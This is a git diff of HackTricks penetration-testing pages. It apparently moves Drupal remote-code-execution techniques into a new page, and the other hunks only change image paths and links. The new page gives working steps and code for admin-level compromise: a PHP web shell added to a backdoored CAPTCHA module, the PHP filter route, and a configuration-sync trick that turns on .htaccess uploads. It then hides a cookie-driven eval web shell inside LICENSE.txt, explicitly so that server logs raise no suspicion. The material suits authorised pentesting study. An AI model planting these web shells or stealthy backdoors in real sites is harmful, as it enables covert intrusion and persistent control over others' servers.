<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -134,7 +134,7 @@ guest guest
|
||||||
* [Burp Extension - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
|
* [Burp Extension - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
|
||||||
* [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
|
* [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -93,7 +93,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
|
||||||
* [**Artifactory**](artifactory-hacking-guide.md)
|
* [**Artifactory**](artifactory-hacking-guide.md)
|
||||||
* [**Buckets**](buckets/)
|
* [**Buckets**](buckets/)
|
||||||
* [**CGI**](cgi.md)
|
* [**CGI**](cgi.md)
|
||||||
* [**Drupal**](drupal.md)
|
* [**Drupal**](drupal/)
|
||||||
* [**Flask**](flask.md)
|
* [**Flask**](flask.md)
|
||||||
* [**Git**](git.md)
|
* [**Git**](git.md)
|
||||||
* [**Golang**](golang.md)
|
* [**Golang**](golang.md)
|
||||||
|
@ -159,10 +159,10 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi
|
||||||
If a CMS is used don't forget to **run a scanner**, maybe something juicy is found:
|
If a CMS is used don't forget to **run a scanner**, maybe something juicy is found:
|
||||||
|
|
||||||
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\
|
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\
|
||||||
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** websites for Security issues. (GUI)\
|
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** websites for Security issues. (GUI)\
|
||||||
[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal.md)**, PrestaShop, Opencart**\
|
[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\
|
||||||
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal.md) **or** [**(M)oodle**](moodle.md)\
|
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **or** [**(M)oodle**](moodle.md)\
|
||||||
[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal.md)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
|
[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
cmsmap [-f W] -F -d <URL>
|
cmsmap [-f W] -F -d <URL>
|
||||||
|
@ -365,7 +365,7 @@ Find more info about web vulns in:
|
||||||
|
|
||||||
You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.
|
You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -60,25 +60,25 @@ Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `REA
|
||||||
|
|
||||||
In _/user/register_ just try to create a username and if the name is already taken it will be notified:
|
In _/user/register_ just try to create a username and if the name is already taken it will be notified:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (328).png>)
|
![](<../../../.gitbook/assets/image (328).png>)
|
||||||
|
|
||||||
#### Request new password
|
#### Request new password
|
||||||
|
|
||||||
If you request a new password for an existing username:
|
If you request a new password for an existing username:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (903).png>)
|
![](<../../../.gitbook/assets/image (903).png>)
|
||||||
|
|
||||||
If you request a new password for a non-existent username:
|
If you request a new password for a non-existent username:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (307).png>)
|
![](<../../../.gitbook/assets/image (307).png>)
|
||||||
|
|
||||||
### Get number of users
|
### Get number of users
|
||||||
|
|
||||||
Accessing _/user/\<number>_ you can see the number of existing users, in this case is 2 as _/users/3_ returns a not found error:
|
Accessing _/user/\<number>_ you can see the number of existing users, in this case is 2 as _/users/3_ returns a not found error:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (333).png>)
|
![](<../../../.gitbook/assets/image (333).png>)
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (227) (1) (1) (1).png>)
|
![](<../../../.gitbook/assets/image (227) (1) (1) (1).png>)
|
||||||
|
|
||||||
### Hidden pages
|
### Hidden pages
|
||||||
|
|
||||||
|
@ -105,75 +105,11 @@ droopescan scan drupal -u http://drupal-site.local
|
||||||
|
|
||||||
## RCE
|
## RCE
|
||||||
|
|
||||||
### With PHP Filter Module
|
If you have access to the Drupal web console check these options to get RCE:
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% content-ref url="drupal-rce.md" %}
|
||||||
In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated."
|
[drupal-rce.md](drupal-rce.md)
|
||||||
{% endhint %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
You need the **plugin php to be installed** (check it accessing to _/modules/php_ and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**)
|
|
||||||
|
|
||||||
Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_
|
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (247) (1).png>)
|
|
||||||
|
|
||||||
Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_
|
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (338).png>)
|
|
||||||
|
|
||||||
Finally just access the newly created node:
|
|
||||||
|
|
||||||
```bash
|
|
||||||
curl http://drupal-site.local/node/3
|
|
||||||
```
|
|
||||||
|
|
||||||
### Install PHP Filter Module
|
|
||||||
|
|
||||||
From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**.
|
|
||||||
|
|
||||||
1. Download the most recent version of the module from the Drupal website.
|
|
||||||
1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
|
|
||||||
2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**.
|
|
||||||
3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**.
|
|
||||||
4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**.
|
|
||||||
|
|
||||||
### Backdoored Module
|
|
||||||
|
|
||||||
A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).
|
|
||||||
|
|
||||||
* Download the archive and extract its contents.
|
|
||||||
|
|
||||||
```
|
|
||||||
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
|
|
||||||
tar xvf captcha-8.x-1.2.tar.gz
|
|
||||||
```
|
|
||||||
|
|
||||||
* Create a **PHP web shell** with the contents:
|
|
||||||
|
|
||||||
```php
|
|
||||||
<?php
|
|
||||||
system($_GET["cmd"]);
|
|
||||||
?>
|
|
||||||
```
|
|
||||||
|
|
||||||
* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder.
|
|
||||||
|
|
||||||
```html
|
|
||||||
<IfModule mod_rewrite.c>
|
|
||||||
RewriteEngine On
|
|
||||||
RewriteBase /
|
|
||||||
</IfModule>
|
|
||||||
```
|
|
||||||
|
|
||||||
* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.
|
|
||||||
|
|
||||||
```bash
|
|
||||||
mv shell.php .htaccess captcha
|
|
||||||
tar cvf captcha.tar.gz captcha/
|
|
||||||
```
|
|
||||||
|
|
||||||
* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**.
|
|
||||||
* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands.
|
|
||||||
|
|
||||||
## Post Exploitation
|
## Post Exploitation
|
||||||
|
|
305
network-services-pentesting/pentesting-web/drupal/drupal-rce.md
Normal file
|
@ -0,0 +1,305 @@
|
||||||
|
# Drupal RCE
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## With PHP Filter Module
|
||||||
|
|
||||||
|
{% hint style="warning" %}
|
||||||
|
In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated." But from version 8 this module is not installed by default.
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
You need the **plugin php to be installed** (check it accessing to _/modules/php_ and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**)
|
||||||
|
|
||||||
|
Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_
|
||||||
|
|
||||||
|
![](<../../../.gitbook/assets/image (247) (1).png>)
|
||||||
|
|
||||||
|
Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_
|
||||||
|
|
||||||
|
![](<../../../.gitbook/assets/image (338).png>)
|
||||||
|
|
||||||
|
Finally just access the newly created node:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
curl http://drupal-site.local/node/3
|
||||||
|
```
|
||||||
|
|
||||||
|
## Install PHP Filter Module
|
||||||
|
|
||||||
|
{% hint style="warning" %}
|
||||||
|
In current versions i't no longer possible to install plugins by only having access to the web after the default installation.
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**.
|
||||||
|
|
||||||
|
1. Download the most recent version of the module from the Drupal website.
|
||||||
|
1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
|
||||||
|
2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**.
|
||||||
|
3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**.
|
||||||
|
4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**.
|
||||||
|
|
||||||
|
## Backdoored Module
|
||||||
|
|
||||||
|
{% hint style="warning" %}
|
||||||
|
In current versions it's no longer possible to install plugins by only having access to the web after the default installation.
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).
|
||||||
|
|
||||||
|
* Download the archive and extract its contents.
|
||||||
|
|
||||||
|
```
|
||||||
|
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
|
||||||
|
tar xvf captcha-8.x-1.2.tar.gz
|
||||||
|
```
|
||||||
|
|
||||||
|
* Create a **PHP web shell** with the contents:
|
||||||
|
|
||||||
|
```php
|
||||||
|
<?php
|
||||||
|
system($_GET["cmd"]);
|
||||||
|
?>
|
||||||
|
```
|
||||||
|
|
||||||
|
* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder.
|
||||||
|
|
||||||
|
```html
|
||||||
|
<IfModule mod_rewrite.c>
|
||||||
|
RewriteEngine On
|
||||||
|
RewriteBase /
|
||||||
|
</IfModule>
|
||||||
|
```
|
||||||
|
|
||||||
|
* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
mv shell.php .htaccess captcha
|
||||||
|
tar cvf captcha.tar.gz captcha/
|
||||||
|
```
|
||||||
|
|
||||||
|
* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**.
|
||||||
|
* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands.
|
||||||
|
|
||||||
|
## Backdooring Drupal with Configuration synchronization <a href="#backdooring-drupal" id="backdooring-drupal"></a>
|
||||||
|
|
||||||
|
**Post shared by** [**Coiffeur0x90**](https://twitter.com/Coiffeur0x90)
|
||||||
|
|
||||||
|
### Part 1 (activation of _Media_ and _Media Library_)
|
||||||
|
|
||||||
|
In the _Extend_ menu (/admin/modules), you can activate what appear to be plugins already installed. By default, plugins _Media_ and _Media Library_ don’t appear to be activated, so let’s activate them.
|
||||||
|
|
||||||
|
Before activation:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
After activation:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Part 2 (leveraging feature _Configuration synchronization_) <a href="#part-2-leveraging-feature-configuration-synchronization" id="part-2-leveraging-feature-configuration-synchronization"></a>
|
||||||
|
|
||||||
|
We’ll leverage the _Configuration synchronization_ feature to dump (export) and upload (import) Drupal configuration entries:
|
||||||
|
|
||||||
|
* /admin/config/development/configuration/single/export
|
||||||
|
* /admin/config/development/configuration/single/import
|
||||||
|
|
||||||
|
**Patch system.file.yml**
|
||||||
|
|
||||||
|
Let’s start by patching the first entry `allow_insecure_uploads` from:
|
||||||
|
|
||||||
|
File: system.file.yml
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
...
|
||||||
|
|
||||||
|
allow_insecure_uploads: false
|
||||||
|
|
||||||
|
...
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
To:
|
||||||
|
|
||||||
|
File: system.file.yml
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
...
|
||||||
|
|
||||||
|
allow_insecure_uploads: true
|
||||||
|
|
||||||
|
...
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
**Patch field.field.media.document.field\_media\_document.yml**
|
||||||
|
|
||||||
|
Then, patch the second entry `file_extensions` from:
|
||||||
|
|
||||||
|
File: field.field.media.document.field\_media\_document.yml
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
...
|
||||||
|
|
||||||
|
file_directory: '[date:custom:Y]-[date:custom:m]'
|
||||||
|
file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
|
||||||
|
|
||||||
|
...
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
To:
|
||||||
|
|
||||||
|
File: field.field.media.document.field\_media\_document.yml
|
||||||
|
|
||||||
|
```
|
||||||
|
...
|
||||||
|
|
||||||
|
file_directory: '[date:custom:Y]-[date:custom:m]'
|
||||||
|
file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
|
||||||
|
|
||||||
|
...
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
> I don’t use it in this blogpost but it is noted that it is possible to define the entry `file_directory` in an arbitrary way and that it is vulnerable to a path traversal attack (so we can go back up within the Drupal filesystem tree).
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Part 3 (leveraging feature _Add Document_) <a href="#part-3-leveraging-feature-add-document" id="part-3-leveraging-feature-add-document"></a>
|
||||||
|
|
||||||
|
The last step is the simplest, and is broken down into two sub-steps. The first is to upload a file in .htaccess format to leverage the Apache directives and allow .txt files to be interpreted by the PHP engine. The second is to upload a .txt file containing our payload.
|
||||||
|
|
||||||
|
File: .htaccess
|
||||||
|
|
||||||
|
```
|
||||||
|
<Files *>
|
||||||
|
SetHandler application/x-httpd-php
|
||||||
|
</Files>
|
||||||
|
|
||||||
|
# Vroum! Vroum!
|
||||||
|
# We reactivate PHP engines for all versions in order to be targetless.
|
||||||
|
<IfModule mod_php.c>
|
||||||
|
php_flag engine on
|
||||||
|
</IfModule>
|
||||||
|
<IfModule mod_php7.c>
|
||||||
|
php_flag engine on
|
||||||
|
</IfModule>
|
||||||
|
<IfModule mod_php5.c>
|
||||||
|
php_flag engine on
|
||||||
|
</IfModule>
|
||||||
|
```
|
||||||
|
|
||||||
|
Why is this trick cool?
|
||||||
|
|
||||||
|
Because once the Webshell (that we’ll call LICENSE.txt ) is dropped onto the Web server, we can transmit our commands via `$_COOKIE` and in the Web server logs, this will show up as a legitimate GET request to a text file.
|
||||||
|
|
||||||
|
Why name our Webshell LICENSE.txt?
|
||||||
|
|
||||||
|
Simply because if we take the following file, for example [core/LICENSE.txt](https://github.com/drupal/drupal/blob/11.x/core/LICENSE.txt) (which is already present in the Drupal core), we have a file of 339 lines and 17.6 KB in size, which is perfect for adding a small snippet of PHP code in the middle (since the file is big enough).
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
File: Patched LICENSE.txt
|
||||||
|
|
||||||
|
```txt
|
||||||
|
|
||||||
|
...
|
||||||
|
|
||||||
|
this License, you may choose any version ever published by the Free Software
|
||||||
|
Foundation.
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
# We inject our payload into the cookies so that in the logs of the compromised
|
||||||
|
# server it shows up as having been requested via the GET method, in order to
|
||||||
|
# avoid raising suspicions.
|
||||||
|
if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
|
||||||
|
if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
|
||||||
|
eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
|
||||||
|
} else {
|
||||||
|
phpinfo();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
10. If you wish to incorporate parts of the Program into other free
|
||||||
|
programs whose distribution conditions are different, write to the author
|
||||||
|
|
||||||
|
...
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
#### **Part 3.1 (upload file .htaccess)**
|
||||||
|
|
||||||
|
First, we leverage the _Add Document_ (/media/add/document) feature to upload our file containing the Apache directives (.htaccess).
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (9).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (10).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
**Part 3.2 (upload file LICENSE.txt)**
|
||||||
|
|
||||||
|
Then, we leverage the _Add Document_ (/media/add/document) feature again to upload a Webshell hidden within a license file.
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (13).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Part 4 (interaction with the Webshell) <a href="#part-4-interaction-with-the-webshell" id="part-4-interaction-with-the-webshell"></a>
|
||||||
|
|
||||||
|
The last part consists of interacting with the Webshell.
|
||||||
|
|
||||||
|
As shown in the following screenshot, if the cookie expected by our Webshell is not defined, we get the subsequent result when consulting the file via a Web browser.
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
When the attacker sets the cookie, he can interact with the Webshell and execute any commands he wants.
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
And as you can see in the logs, it looks like only a txt file has been requested.
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Thank you for taking the time to read this article, I hope it will help you get some shells.
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
@ -22,7 +22,7 @@ If the preload script exposes an IPC endpoint from the main.js file, the rendere
|
||||||
|
|
||||||
Example from [https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21](https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21) (you have the full example of how MS Teams was abusing from XSS to RCE in those slides, this is just a very basic example):
|
Example from [https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21](https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21) (you have the full example of how MS Teams was abusing from XSS to RCE in those slides, this is just a very basic example):
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (9).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (9) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
## Example 1
|
## Example 1
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -80,7 +80,7 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h
|
||||||
* [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
|
* [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
|
||||||
* [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan)
|
* [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
